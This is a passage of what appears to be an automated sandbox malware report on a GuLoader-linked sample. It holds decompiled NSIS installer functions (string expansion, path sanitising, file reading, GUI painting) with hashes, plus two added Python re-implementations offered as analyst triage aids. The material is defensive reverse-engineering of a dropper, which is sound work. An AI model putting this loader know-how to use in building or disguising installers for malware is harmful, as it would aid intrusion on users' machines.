                    									_t63 =  *_t59( *0x7a8a68,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
                    									__eflags = _t63;
                    									if(_t63 == 0) {
                    										goto L26;
                    									}
                    									goto L22;
                    								}
                    								goto L26;
                    							}
                    							GetSystemDirectoryW(_t108, 0x400);
                    							goto L26;
                    						} else {
                    							E004063E8( *0x7a8a98, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x7a8a98 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
                    							if( *_t108 != 0) {
                    								L27:
                    								if(_v16 == 0x1a) {
                    									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
                    								}
                    								goto L29;
                    							}
                    							E00406557(_t77, _t105, _t108, _t108, _v16);
                    							L26:
                    							if( *_t108 == 0) {
                    								goto L29;
                    							}
                    							goto L27;
                    						}
                    					}
                    					goto L43;
                    				}
                    			}





























                    [statement address column for E00406557, 0x00406557 to 0x0040679e, detached from the listing above by extraction]

                    APIs
                    • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00406672
                    • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,007A0F28,?,004055B3,007A0F28,00000000,00000000,0079BD28,7555110C), ref: 00406685
                    • lstrcatW.KERNEL32 ref: 004066FC
                    • lstrlenW.KERNEL32(Call,00000000,007A0F28,?,004055B3,007A0F28,00000000), ref: 00406756
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: Directory$SystemWindowslstrcatlstrlen
                    • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                    • API String ID: 4260037668-1230650788
                    • Opcode ID: da38963e672fb73e568923eb237ce0014ee8c8129af21826515d3029acbe5ea3
                    • Instruction ID: 9e459ffa4d797bbc81f49b8710fc234ac44c95668d32beb4df18aeb57a87e6f9
                    • Opcode Fuzzy Hash: da38963e672fb73e568923eb237ce0014ee8c8129af21826515d3029acbe5ea3
                    • Instruction Fuzzy Hash: E061D271900206AADF109F64DC40BAE37A5AF55318F22C13BE917B72D0DB7D8AA1CB5D
                    Uniqueness

                    Uniqueness Score: -1.00%
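
The function above, E00406557, is a string expander. It walks a wide-character string, copies ordinary characters, and treats code points 1 to 4 as escapes: 1 is a language-table string, resolved by the recursive call with a negated index; 2 is a shell folder, looked up through SHGetSpecialFolderLocation and SHGetPathFromIDListW with GetWindowsDirectoryW and GetSystemDirectoryW as special cases and a registry fallback under Software\Microsoft\Windows\CurrentVersion; 3 is a variable, copied from a table of 0x800-byte slots at 0x7a9000, except that variable 29 is produced from the global at 0x7a8a68 (the same window handle passed to SHGetSpecialFolderLocation); 4 means "take the next character literally". Escapes 1 to 3 are followed by two payload characters whose low 7 bits form a 14-bit index. When the all-users byte of a shell escape is 0x1A (CSIDL_APPDATA) the string "\Microsoft\Internet Explorer\Quick Launch" is appended, and variables 21 to 27 as well as every shell folder go through the cleanup routine E004067A1 before use. This is the string-expansion routine of the NSIS installer stub (the editor's identification; the report does not name it), which matters for triage because it marks this function, like the GDI painting code around it, as installer boilerplate rather than the GuLoader stage itself. The decoder below is the editor's added re-implementation, not code from the report or from the sample: the shell-folder lookup is injected as a callback so it runs offline, the cleanup step is approximated, the fallback chain through several CSIDLs and the registry branch are not modelled, the window handle is assumed to be rendered in decimal, and every sample variable and folder is constructed.

```python
"""Decoder for the string encoding expanded by E00406557 (editor's added example)."""
from typing import Callable, Sequence

# Escape codes read from the head of each character (the `< 4` test in the listing).
NS_LANG_CODE, NS_SHELL_CODE, NS_VAR_CODE, NS_SKIP_CODE = 1, 2, 3, 4
VAR_HWNDPARENT = 29           # variable produced from the global at 0x7a8a68 via E00406461
PATH_VARS = range(21, 28)     # variables sent through the filename cleanup (_t78 - 21 < 7)
CSIDL_APPDATA = 0x1A
CSIDL_WINDOWS, CSIDL_SYSTEM = 0x24, 0x25   # the GetWindowsDirectoryW / GetSystemDirectoryW cases
QUICK_LAUNCH_SUFFIX = "\\Microsoft\\Internet Explorer\\Quick Launch"
MAX_STRLEN = 1024             # 0x800 bytes of WCHARs, the loop bound in the listing


def clean_filename(s: str) -> str:
    """Approximation (assumption) of the E004067A1 cleanup: strip leading spaces,
    drop characters that cannot appear in a path component (keeping a drive
    prefix), trim trailing spaces and backslashes."""
    s = s.lstrip(" ")
    drive, rest = "", s
    if len(s) >= 3 and s[1] == ":" and s[2] == "\\":
        drive, rest = s[:3], s[3:]
    rest = "".join(ch for ch in rest if ord(ch) > 31 and ch not in '*?|<>/":')
    return (drive + rest).rstrip(" \\")


def decode_nsis_string(encoded: str, user_vars: Sequence[str], lang_strings: Sequence[str],
                       shell_folder: Callable[[int], str], hwnd_parent: int = 0,
                       all_users: bool = False) -> str:
    out: list = []
    i, n = 0, len(encoded)
    while i < n and len(out) < MAX_STRLEN:
        code = ord(encoded[i])
        i += 1
        if code > NS_SKIP_CODE:            # ordinary character
            out.append(chr(code))
            continue
        if code == NS_SKIP_CODE:           # next character is literal even if it is a code
            if i < n:
                out.append(encoded[i])
                i += 1
            continue
        # codes 1..3 are followed by two payload characters; the low 7 bits of each form the index
        b0, b1 = ord(encoded[i]) & 0xFF, ord(encoded[i + 1]) & 0xFF
        i += 2
        idx = ((b1 & 0x7F) << 7) | (b0 & 0x7F)
        if code == NS_VAR_CODE:
            piece = str(hwnd_parent) if idx == VAR_HWNDPARENT else user_vars[idx]
            if idx in PATH_VARS:
                piece = clean_filename(piece)
        elif code == NS_LANG_CODE:
            # language strings are themselves encoded, hence the recursive call in the listing
            piece = decode_nsis_string(lang_strings[idx], user_vars, lang_strings,
                                       shell_folder, hwnd_parent, all_users)
        else:                               # NS_SHELL_CODE: b0 = current-user CSIDL, b1 = all-users CSIDL
            piece = shell_folder(b1 if all_users else b0)   # all_users mirrors the *0x7a8ae4 flag
            if piece and b1 == CSIDL_APPDATA:
                piece += QUICK_LAUNCH_SUFFIX
            piece = clean_filename(piece)
        out.extend(piece)
    return "".join(out[:MAX_STRLEN])


# Encoders for building test input; payload bytes are given bit 7 here so that neither can be a
# string terminator (the decoder masks it off).
def _payload(idx: int) -> str:
    return chr(0x80 | (idx & 0x7F)) + chr(0x80 | ((idx >> 7) & 0x7F))

def var_ref(idx: int) -> str:
    return chr(NS_VAR_CODE) + _payload(idx)

def lang_ref(idx: int) -> str:
    return chr(NS_LANG_CODE) + _payload(idx)

def shell_ref(user_csidl: int, all_csidl: int) -> str:
    return chr(NS_SHELL_CODE) + chr(user_csidl) + chr(all_csidl)


# Constructed sample state (not taken from the sandbox run).
SAMPLE_VARS = [""] * 32
SAMPLE_VARS[0] = "payload.exe"
SAMPLE_VARS[21] = "C:\\Program Files\\Vendor\\App\\ "       # $INSTDIR with trailing junk
SAMPLE_LANG = ["Installing " + var_ref(0)]                 # language string referencing $0
SAMPLE_FOLDERS = {CSIDL_APPDATA: "C:\\Users\\u\\AppData\\Roaming",
                  CSIDL_WINDOWS: "C:\\Windows", CSIDL_SYSTEM: "C:\\Windows\\System32"}

def sample_folder(csidl: int) -> str:
    return SAMPLE_FOLDERS.get(csidl, "")

if __name__ == "__main__":
    print(decode_nsis_string(var_ref(21) + "\\" + var_ref(0), SAMPLE_VARS, SAMPLE_LANG, sample_folder))
    print(decode_nsis_string(shell_ref(CSIDL_APPDATA, CSIDL_APPDATA), SAMPLE_VARS, SAMPLE_LANG, sample_folder))
```

Running the decoder over a sample's string table with the variables recovered from its memory dump is the quickest way to read out the paths an NSIS-packaged dropper resolves at run time, which is where the interesting behaviour of this sample (the files written to the user root directory and the process it spawns) is configured, not in the expander itself.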

                    C-Code - Quality: 100%
                    			E004044DD(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                    				struct tagLOGBRUSH _v16;
                    				long _t39;
                    				long _t41;
                    				void* _t44;
                    				signed char _t50;
                    				long* _t54;
                    
                    				if(_a4 + 0xfffffecd > 5) {
                    					L18:
                    					return 0;
                    				}
                    				_t54 = GetWindowLongW(_a12, 0xffffffeb);
                    				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
                    					goto L18;
                    				} else {
                    					_t50 = _t54[5];
                    					if((_t50 & 0xffffffe0) != 0) {
                    						goto L18;
                    					}
                    					_t39 =  *_t54;
                    					if((_t50 & 0x00000002) != 0) {
                    						_t39 = GetSysColor(_t39);
                    					}
                    					if((_t54[5] & 0x00000001) != 0) {
                    						SetTextColor(_a8, _t39);
                    					}
                    					SetBkMode(_a8, _t54[4]);
                    					_t41 = _t54[1];
                    					_v16.lbColor = _t41;
                    					if((_t54[5] & 0x00000008) != 0) {
                    						_t41 = GetSysColor(_t41);
                    						_v16.lbColor = _t41;
                    					}
                    					if((_t54[5] & 0x00000004) != 0) {
                    						SetBkColor(_a8, _t41);
                    					}
                    					if((_t54[5] & 0x00000010) != 0) {
                    						_v16.lbStyle = _t54[2];
                    						_t44 = _t54[3];
                    						if(_t44 != 0) {
                    							DeleteObject(_t44);
                    						}
                    						_t54[3] = CreateBrushIndirect( &_v16);
                    					}
                    					return _t54[3];
                    				}
                    			}









                    [statement address column for E004044DD, 0x004044ef to 0x004045a5, detached from the listing above by extraction]

                    APIs
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                    • String ID:
                    • API String ID: 2320649405-0
                    • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                    • Instruction ID: 307f0adb03de418db05ce456a6e98ecd908ab5abab62206e0655cd74099b0a55
                    • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                    • Instruction Fuzzy Hash: 702197B1501708BFD7309F28DD08B5BBBF8AF80714B00852EEA92A22E1D738D914CB54
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 87%
                    			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
                    				intOrPtr _t65;
                    				intOrPtr _t66;
                    				intOrPtr _t72;
                    				void* _t76;
                    				void* _t79;
                    
                    				_t72 = __edx;
                    				 *((intOrPtr*)(_t76 - 8)) = __ebx;
                    				_t65 = 2;
                    				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
                    				_t66 = E00402D84(_t65);
                    				_t79 = _t66 - 1;
                    				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
                    				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
                    				if(_t79 < 0) {
                    					L36:
                    					 *0x7a8ae8 =  *0x7a8ae8 +  *(_t76 - 4);
                    				} else {
                    					__ecx = 0x3ff;
                    					if(__eax > 0x3ff) {
                    						 *(__ebp - 0x44) = 0x3ff;
                    					}
                    					if( *__edi == __bx) {
                    						L34:
                    						__ecx =  *(__ebp - 0xc);
                    						__eax =  *(__ebp - 8);
                    						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
                    						if(_t79 == 0) {
                    							 *(_t76 - 4) = 1;
                    						}
                    						goto L36;
                    					} else {
                    						 *(__ebp - 0x38) = __ebx;
                    						 *(__ebp - 0x18) = E0040647A(__ecx, __edi);
                    						if( *(__ebp - 0x44) > __ebx) {
                    							do {
                    								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
                    									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E004060EB( *(__ebp - 0x18), __ebx) >= 0) {
                    										__eax = __ebp - 0x50;
                    										if(E0040608D( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
                    											goto L34;
                    										} else {
                    											goto L21;
                    										}
                    									} else {
                    										goto L34;
                    									}
                    								} else {
                    									__eax = __ebp - 0x40;
                    									_push(__ebx);
                    									_push(__ebp - 0x40);
                    									__eax = 2;
                    									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
                    									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
                    									if(__eax == 0) {
                    										goto L34;
                    									} else {
                    										__ecx =  *(__ebp - 0x40);
                    										if(__ecx == __ebx) {
                    											goto L34;
                    										} else {
                    											__ax =  *(__ebp + 0xa) & 0x000000ff;
                    											 *(__ebp - 0x4c) = __ecx;
                    											 *(__ebp - 0x50) = __eax;
                    											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                    												L28:
                    												__ax & 0x0000ffff = E00406461( *(__ebp - 0xc), __ax & 0x0000ffff);
                    											} else {
                    												__ebp - 0x50 = __ebp + 0xa;
                    												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
                    													L21:
                    													__eax =  *(__ebp - 0x50);
                    												} else {
                    													__edi =  *(__ebp - 0x4c);
                    													__edi =  ~( *(__ebp - 0x4c));
                    													while(1) {
                    														_t22 = __ebp - 0x40;
                    														 *_t22 =  *(__ebp - 0x40) - 1;
                    														__eax = 0xfffd;
                    														 *(__ebp - 0x50) = 0xfffd;
                    														if( *_t22 == 0) {
                    															goto L22;
                    														}
                    														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
                    														__edi = __edi + 1;
                    														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
                    														__eax = __ebp + 0xa;
                    														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
                    															continue;
                    														} else {
                    															goto L21;
                    														}
                    														goto L22;
                    													}
                    												}
                    												L22:
                    												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                    													goto L28;
                    												} else {
                    													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
                    														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
                    															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
                    															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
                    														} else {
                    															__ecx =  *(__ebp - 0xc);
                    															__edx =  *(__ebp - 8);
                    															 *(__ebp - 8) =  *(__ebp - 8) + 1;
                    															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                    														}
                    														goto L34;
                    													} else {
                    														__ecx =  *(__ebp - 0xc);
                    														__edx =  *(__ebp - 8);
                    														 *(__ebp - 8) =  *(__ebp - 8) + 1;
                    														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                    														 *(__ebp - 0x38) = __eax;
                    														if(__ax == __bx) {
                    															goto L34;
                    														} else {
                    															goto L26;
                    														}
                    													}
                    												}
                    											}
                    										}
                    									}
                    								}
                    								goto L37;
                    								L26:
                    								__eax =  *(__ebp - 8);
                    							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
                    						}
                    						goto L34;
                    					}
                    				}
                    				L37:
                    				return 0;
                    			}









                    APIs
                    • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
                    • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                    • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                    • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                      • Part of subcall function 004060EB: SetFilePointer.KERNEL32(?,00000000,00000000,00000001,00000000,?,?,?,004026D1,00000000,00000000,?,00000000,00000011), ref: 00406101
                    • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                    Strings
                    Similarity
                    • API ID: File$Pointer$ByteCharMultiWide$Read
                    • String ID: 9
                    • API String ID: 163830602-2366072709
                    • Opcode ID: 588ede5e84484d8860c92fb66ffae47e610f47b9ca95ac382e9d1b4b4742ae18
                    • Instruction ID: be08228a48e351455db253d3f5410474da148bca98ac48c4339161726040cff4
                    • Opcode Fuzzy Hash: 588ede5e84484d8860c92fb66ffae47e610f47b9ca95ac382e9d1b4b4742ae18
                    • Instruction Fuzzy Hash: 89510A75D00219AADF20EFD5CA88AAEBB79FF04304F10817BE541B62D4D7B49D82CB58
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 91%
                    			E004067A1(WCHAR* _a4) {
                    				short _t5;
                    				short _t7;
                    				WCHAR* _t19;
                    				WCHAR* _t20;
                    				WCHAR* _t21;
                    
                    				_t20 = _a4;
                    				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
                    					_t20 =  &(_t20[4]);
                    				}
                    				if( *_t20 != 0 && E00405E60(_t20) != 0) {
                    					_t20 =  &(_t20[2]);
                    				}
                    				_t5 =  *_t20;
                    				_t21 = _t20;
                    				_t19 = _t20;
                    				if(_t5 != 0) {
                    					do {
                    						if(_t5 > 0x1f &&  *((short*)(E00405E16(L"*?|<>/\":", _t5))) == 0) {
                    							E00405FC5(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
                    							_t19 = CharNextW(_t19);
                    						}
                    						_t20 = CharNextW(_t20);
                    						_t5 =  *_t20;
                    					} while (_t5 != 0);
                    				}
                    				 *_t19 =  *_t19 & 0x00000000;
                    				while(1) {
                    					_push(_t19);
                    					_push(_t21);
                    					_t19 = CharPrevW();
                    					_t7 =  *_t19;
                    					if(_t7 != 0x20 && _t7 != 0x5c) {
                    						break;
                    					}
                    					 *_t19 =  *_t19 & 0x00000000;
                    					if(_t21 < _t19) {
                    						continue;
                    					}
                    					break;
                    				}
                    				return _t7;
                    			}









                    APIs
                    Strings
                    Similarity
                    • API ID: Char$Next$Prev
                    • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                    • API String ID: 589700163-3083651966
                    • Opcode ID: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                    • Instruction ID: df5be6298df38fe53a3c1647d4a953459580f705d81a6df7816dadf9acb4bb56
                    • Opcode Fuzzy Hash: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                    • Instruction Fuzzy Hash: C0110D2680161295DB3037149D84A7766F8EF58BA4F56803FED86732C0F77C4C9286BD
                    Uniqueness

                    Uniqueness Score: -1.00%
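                    The routine E004067A1 listed above is a file-name sanitiser: it steps past a leading \\?\ prefix (0x5c 0x5c 0x3f 0x5c), steps past two more code units when the helper E00405E60 returns non-zero, compacts the remainder in place keeping only code units above 0x1f that are not in the literal *?|<>/":, and finally zeroes trailing spaces and backslashes with a CharPrevW loop that stops where the rewrite began. The Python below is an added re-implementation for analysts who want to see how a given path comes out of this step; it is not code from the report or from the analysed sample. E00405E60 is not on the page, so treating it as a drive-letter ("C:") or UNC ("\\") prefix check is an assumption, as is the function name validate_filename; the sample inputs are constructed (the first is the path shown in the String ID above).

```python
# Added example: Python re-implementation of the path-sanitising routine
# decompiled as E004067A1.  Not code from the report or the sample.
#
# Behaviour taken from the listing:
#   * a leading "\\?\" (0x5c 0x5c 0x3f 0x5c) is skipped (4 code units);
#   * if E00405E60 returns non-zero the next 2 code units are skipped too;
#   * every remaining code unit <= 0x1f or in  *?|<>/":  is dropped in place;
#   * trailing ' ' and '\\' are then zeroed, never crossing back into the
#     skipped prefix.
# ASSUMPTION: E00405E60 (not shown on the page) recognises a drive-letter
# ("C:") or UNC ("\\") prefix; that is the only reading under which
# "skip two code units" makes sense.

INVALID_CHARS = frozenset('*?|<>/":')   # string literal referenced by the routine
EXTENDED_PREFIX = "\\\\?\\"             # the four code units \\?\


def has_path_spec(s: str) -> bool:
    """Assumed behaviour of the unseen helper E00405E60."""
    if len(s) < 2:
        return False
    if s[0] == "\\" and s[1] == "\\":          # UNC:  \\server\share
        return True
    return s[1] == ":" and s[0].isascii() and s[0].isalpha()   # drive: C:


def validate_filename(path: str) -> str:
    """Return the buffer as the routine leaves it (it rewrites in place).

    Skipped prefixes are kept verbatim: the routine only advances its
    read/write pointer past them, it never erases them.
    """
    kept = ""
    rest = path
    if rest.startswith(EXTENDED_PREFIX):
        kept, rest = rest[:4], rest[4:]
    if rest and has_path_spec(rest):
        kept, rest = kept + rest[:2], rest[2:]
    # compaction loop: copy only acceptable code units
    body = "".join(c for c in rest if ord(c) > 0x1F and c not in INVALID_CHARS)
    # CharPrevW loop: strip trailing ' ' and '\\', stopping at the rewrite start
    body = body.rstrip(" \\")
    return kept + body


if __name__ == "__main__":
    # Constructed inputs; the first is the path seen in the String ID above.
    for sample in (
        "C:\\Users\\user\\AppData\\Local\\Temp\\",
        "\\\\?\\C:\\drop<ped>?.exe  ",
        "\\\\server\\share\\a:b|c",
        "name\x01with\x1fcontrols\\ \\",
    ):
        print(repr(sample), "->", repr(validate_filename(sample)))
```

Note that the routine never rejects a name; it silently rewrites it, so a dropped-file path recovered from the sample's script or from memory may differ from what is eventually written to disk. Running the candidate path through this step before searching the file system for the artefact avoids that mismatch.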

                    C-Code - Quality: 100%
                    			E00404E31(struct HWND__* _a4, intOrPtr _a8) {
                    				long _v8;
                    				signed char _v12;
                    				unsigned int _v16;
                    				void* _v20;
                    				intOrPtr _v24;
                    				long _v56;
                    				void* _v60;
                    				long _t15;
                    				unsigned int _t19;
                    				signed int _t25;
                    				struct HWND__* _t28;
                    
                    				_t28 = _a4;
                    				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
                    				if(_a8 == 0) {
                    					L4:
                    					_v56 = _t15;
                    					_v60 = 4;
                    					SendMessageW(_t28, 0x113e, 0,  &_v60);
                    					return _v24;
                    				}
                    				_t19 = GetMessagePos();
                    				_v16 = _t19 >> 0x10;
                    				_v20 = _t19;
                    				ScreenToClient(_t28,  &_v20);
                    				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
                    				if((_v12 & 0x00000066) != 0) {
                    					_t15 = _v8;
                    					goto L4;
                    				}
                    				return _t25 | 0xffffffff;
                    			}















                    APIs
                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E4C
                    • GetMessagePos.USER32 ref: 00404E54
                    • ScreenToClient.USER32(?,?), ref: 00404E6E
                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404E80
                    • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EA6
                    Strings
                    Similarity
                    • API ID: Message$Send$ClientScreen
                    • String ID: f
                    • API String ID: 41195575-1993550816
                    • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                    • Instruction ID: da5f2d6a974e9c572a85d9e94ff0a86548add23bfd296e24df18a92b611d7590
                    • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                    • Instruction Fuzzy Hash: 2F018C71900219BADB00DBA4DD81BFEBBBCAB94710F10002BBB10B61C0C7B4AA018BA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
                    				short _v132;
                    				int _t11;
                    				int _t20;
                    
                    				if(_a8 == 0x110) {
                    					SetTimer(_a4, 1, 0xfa, 0);
                    					_a8 = 0x113;
                    				}
                    				if(_a8 == 0x113) {
                    					_t20 =  *0x7936f8; // 0x4fcbb
                    					_t11 =  *0x79f704; // 0x4fcbf
                    					if(_t20 >= _t11) {
                    						_t20 = _t11;
                    					}
                    					wsprintfW( &_v132, L"verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
                    					SetWindowTextW(_a4,  &_v132);
                    					SetDlgItemTextW(_a4, 0x406,  &_v132);
                    				}
                    				return 0;
                    			}







                    APIs
                    Strings
                    • verifying installer: %d%%, xrefs: 00402FE6
                    Similarity
                    • API ID: Text$ItemTimerWindowwsprintf
                    • String ID: verifying installer: %d%%
                    • API String ID: 1451636040-82062127
                    • Opcode ID: d023595f9e9ef59bdd75dda31b52a3c2e885d3e2bc42a898f2d7cd706f4c6b2f
                    • Instruction ID: 93fc8baa8d380bd3002b945ae1bdcf8604075b20dc3457daa0419b6feabf18a2
                    • Opcode Fuzzy Hash: d023595f9e9ef59bdd75dda31b52a3c2e885d3e2bc42a898f2d7cd706f4c6b2f
                    • Instruction Fuzzy Hash: EC014F7064020DBBEF209F60DE4ABEA3B79EB00345F108039FA06B51D0DBB99A559B58
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 75%
                    			E734F2655() {
                    				intOrPtr _t24;
                    				void* _t26;
                    				intOrPtr _t27;
                    				signed int _t39;
                    				void* _t40;
                    				void* _t43;
                    				intOrPtr _t44;
                    				void* _t45;
                    
                    				_t40 = E734F12BB();
                    				_t24 =  *((intOrPtr*)(_t45 + 0x18));
                    				_t44 =  *((intOrPtr*)(_t24 + 0x1014));
                    				_t43 = (_t44 + 0x81 << 5) + _t24;
                    				do {
                    					if( *((intOrPtr*)(_t43 - 4)) >= 0) {
                    					}
                    					_t39 =  *(_t43 - 8) & 0x000000ff;
                    					if(_t39 <= 7) {
                    						switch( *((intOrPtr*)(_t39 * 4 +  &M734F2784))) {
                    							case 0:
                    								 *_t40 = 0;
                    								goto L17;
                    							case 1:
                    								__eax =  *__eax;
                    								if(__ecx > __ebx) {
                    									 *(__esp + 0x10) = __ecx;
                    									__ecx =  *(0x734f407c + __edx * 4);
                    									__edx =  *(__esp + 0x10);
                    									__ecx = __ecx * __edx;
                    									asm("sbb edx, edx");
                    									__edx = __edx & __ecx;
                    									__eax = __eax &  *(0x734f409c + __edx * 4);
                    								}
                    								_push(__eax);
                    								goto L15;
                    							case 2:
                    								__eax = E734F1510(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
                    								goto L16;
                    							case 3:
                    								__ecx =  *0x734f506c;
                    								__edx = __ecx - 1;
                    								__eax = MultiByteToWideChar(__ebx, __ebx,  *__eax, __ecx, __edi, __edx);
                    								__eax =  *0x734f506c;
                    								 *((short*)(__edi + __eax * 2 - 2)) = __bx;
                    								goto L17;
                    							case 4:
                    								__eax = lstrcpynW(__edi,  *__eax,  *0x734f506c);
                    								goto L17;
                    							case 5:
                    								_push( *0x734f506c);
                    								_push(__edi);
                    								_push( *__eax);
                    								__imp__StringFromGUID2();
                    								goto L17;
                    							case 6:
                    								_push( *__esi);
                    								L15:
                    								__eax = wsprintfW(__edi, 0x734f5000);
                    								L16:
                    								__esp = __esp + 0xc;
                    								goto L17;
                    						}
                    					}
                    					L17:
                    					_t26 =  *(_t43 + 0x14);
                    					if(_t26 != 0 && ( *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x18)))) != 2 ||  *((intOrPtr*)(_t43 - 4)) > 0)) {
                    						GlobalFree(_t26);
                    					}
                    					_t27 =  *((intOrPtr*)(_t43 + 0xc));
